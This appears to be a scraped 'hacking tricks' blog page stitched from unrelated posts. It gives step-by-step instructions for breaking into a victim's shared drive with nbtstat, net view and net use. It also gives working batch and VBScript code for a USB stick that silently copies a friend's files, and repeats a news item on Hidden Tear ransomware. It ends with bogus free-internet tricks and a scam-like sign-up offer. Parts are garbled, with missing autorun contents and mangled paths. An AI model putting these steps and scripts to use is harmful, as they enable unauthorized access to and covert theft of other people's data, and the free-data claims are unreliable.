Click on the link below and sign up and claim 20000($ 2000).
Steps to Follow:
Now Go to Star and click Run and then type as “CMD” and hit enter.
command prompt will open.
Type in cmd as “nbtstat -a IPaddressOfVictim” and hit enter.
(use ping command to know victim ipaddress)
nbstat -a 220.127.116.11
If you see this your in NetBIOS Remote Machine Name Table
Name Type Status—————————————————————
user<00> UNIQUE Registered
workgroup <00> GROUP Registered
user <03> UNIQUE Registered
user <20> UNIQUE Registered
MAC Address = xx-xx-xx-xx-xx-xx
If you don’t get the number <20>.
The victim disabled the File And Printer Sharing, find another victim.
Now type as “net use x: \IPaddressOfVictimCDISK” and hit enter>
replace with ip address of vitim in the place of “IPaddressOfVictim.
You can give any letter instead of ‘x’.
net use x:\18.104.22.168CDISK
Now open windows explorer or just double click on the My Computer icon on your
desktop and you will see a new network drive
Now open windows explorer or just double click on the My Computer icon on your
desktop and you will see a new network drive X:.
This hack will only work if you have the ip of someone on your network. It will not work if the ip of the person you want to “hack” is not on your network.
If you can only access your targets shared folder put a batch file in their shared folder with the command C=C if they open it,it will share their hardrive.
Follow, Like, Comment & Share!
hello guys,have u ever want something from your friend pc,that he is not giving you like games,movies,important files etc.here i come with cool tricks just plug your USB Flash drive into his PC to automatically copy his files to your pen drive, secretly and silently. Copy the files you brought to his PC to complete the act.
Sneaky, isn’t it? So let us prepare such a sinister USB Flash drive.
Open Notepad (I recommend Notepad++) and copy-paste the following lines.
action=Click OK to Run
Save this as autorun.inf
The icon line is optional. You can change the icon to your tastes or leave it to the default icon. It’s useful for social engineering purposes like enticing the user to click a file on the drive by making it looks like a game or something.
The “action=” command is optional too but sometimes when the autorun launches it may ask the user what to open. Depending on what you put here the user will be instructed to click Ok or run the file. This code acts as a backup just in case the user is asked what to open. This is not required if you are operating the computer.
The “shell/open command” also acts as a backup in case the user clicks cancel instead of open when prompted. This code will execute when the drive letter is clicked on.
Open Notepad again and copy-paste the following lines
set backupcmd=xcopy /s /c /d /e /h /i /r /y
%backupcmd% “%USERPROFILE%\pictures” “%drive%\all\My pics”
%backupcmd% “%USERPROFILE%\Favorites” “%drive%\all\Favorites”
%backupcmd% “%USERPROFILE%\videos” “%drive%\all\vids”
Save this as file.bat
This file is configured to copy the contents of the current users pictures, favorites, and videos folder to the Flash drive under a folder called “all”. This is the section of the code you will need to edit depending on what you want to copy.
The first file path “%USERPROFILE%\pictures” – is the target.
The second file path “%drive%\all\My pics” – is the destination.
Open Notepad once again and copy-paste the following line.
CreateObject(“Wscript.Shell”).Run “””” & WScript.Arguments(0) & “”””, 0, False
Save this as invisible.vbs
This code runs the file.bat as a process so it does not show the CMD prompt and everything the batch file is processing.
Open Notepad one last time and copy-paste the following line.
wscript.exe \invisible.vbs file.bat
Save this as launch.bat
This batch file does two things, it looks for the invisible.vbs file in the root of the Flash drive then loads it with file.bat so file.bat is run with code from vbs file.
Copy all 4 files created in the above steps and put it on the root of the Flash drive, including the icon file if needed. Also create a folder named “all” where the contents are to be copied automatically. You can call this folder by any name, but then you need to reflect the changes you made in step 2.
This is all that needs to be done. Test the Flash drive on your own computer first before playing it out on your victim. It works flawlessly.
Posted by: Richard Twum
Step 1:- Finding the target
So first off we need to find a computer or the computer to hack into. So if your
plugged in to the LAN, or connected to the WAN, you can begin. Open up Cain and
Abel. This program has a built in sniffer feature. A sniffer looks for all IP addresses in the local sub net. Once you have opened up the program click on the sniffer tab, click the Start/Stop sniffer, and then click the blue cross.
Another window will pop up, make sure “All host in my subnet” is selected, and then
It should begin to scan.
Then IP’s, computer names, and mac addresses will show up
Now remember the IP address of the computer you are going to be breaking into.
If you can’t tell whether the IP address is a computer, router, modem, etc, that’s ok.
During the next step we will begin our trial and error.
Step 2:- Trial and error
Now, we don’t know if we have our designated target, or if we have a computer or
printer, or whatever else is on the LAN or WAN.
If you did get the IP of the target though, I still recommend reading through this
section, for it could be helpful later on.
Click on the start menu and go to run, type in cmd, and click ok.
This should bring up the command prompt.
From here we will do most of the hacking.
Now I will be referring to certain commands that need to be inputted into the
I will put these commands in quotes, but do not put the quotes in the code when you
type it into the prompt.
I am only doing this to avoid confusion.
Let’s get back to the hacking.
Type in “ping (IP address of the target).” For example in this tutorial, “ping
This will tell us if the target is online.
If it worked, it will look something like this (note, I have colored out private
IF it didn’t work, meaning that the target is not online, it will look something like this:
If the target is not online, either switch to a different target, or try another time.
If the target is online, then we can proceed.
Step 4:– Gathering the information
Now, input this command “nbtstat –a (IP address of target).” An example would be
“nbtstat –a 192.168.1.103.”
This will show us if there is file sharing enabled, and if there is, it will give us the:
currently logged on user, workgroup, and computer name.
Step 5:- Getting In
Finally it’s time.
By now we know: that our target is online, our target has file sharing, and our target’s
So it’s time to break in.
We will now locate the shared drives, folders, files, or printers. Type in “net view
(IP Address of Target)”
An example for this tutorial would be: “net view 192.168.1.103”
We have our just found our share name. In this case, under the share name is “C,”
meaning that the only shared thing on the computer is C. Then to the right, under
Type, it says “Disk.” This means that it is the actual C DISK of the computer. The C
DISK can sometimes be an entire person’s hard drive.
As you can see, for my hack I have already used “K,” so I used “G” instead.
You may also do the same for multiple hacks.
If it worked, it will say “The command completed successfully.”
If not, you will have to go retrace you steps.
Now open up “my computer” under the start menu, and your newly created network
drive should be there.
Now, if you disconnect from the WAN or LAN, you will not be able to access this
drive, hence the name Network Drive.
The drive will not be deleted after you disconnect though, but you won’t be able to
access it until you reconnect to the network.
So if you are doing this for the content of the drive, I recommend dragging the files
and folders inside of the drive onto your computer,
because you never know if the target changes the sharing setting.
Congratulations! You’re DONE!
-Commands used in this tutorial:
NBTSTAT -a (IP Address of Target)
NET VIEW (IP Address of Target)
NET USE K: (IP Address of Target)(SHARENAME)
-Program used in this tutorial:
Cain and Abel.
Turkish security researcher named Utku Sen has posted a fully functional Ransomware code on open source code sharing website GitHub.
The Ransomware dubbed Hidden Tear, uses AES Encryption to lock down files before displaying a ransom message warning to get users to pay up.
The currently undetectable version of ransomware can be modified and implemented accordingly, as it contains every feature a cybercriminal can expect from modern malware.
Sen describes his Ransomware as “a ransomware-like file crypter sample which can be modified for specific purposes.” This means even script kiddies can now develop their own Ransomware to threaten people.
The Hidden Tear — Free Ransomware Kit
The “Hidden Tear” Ransomware package consists of four files namely:
Hidden Tear Ransomware is capable of:
- Using AES algorithm to encrypt files
- Sending encryption key to a server
- Encrypting files and decrypting them using a decrypter program with the encryption key
- Creating a text file in Desktop with given message
- Small file size (12 KB)
- Evading detection by all standard anti-virus programs
- Follow Me!
Free Browsing Trick 2.
Remove your sim & use a coin or key to scratch the metal- like at the back. The upper Right bar & Lower Left.
After that put it in the phone and just turn on your data and start browsing. No VPN need in this trick.
Scratch the entire metal if the above doesn’t work. Please don’t scratch too Hard but make sure the metal is some how black. Put the sim back and turn on data. BINGO!!!
First download Turbo VPN
1. Go to settings
4.Create new access point with these details.
Name: Airtel 4g
APN type: default, supl
Save it & Select it.
After that turn on data and open Turbo VPN and connect.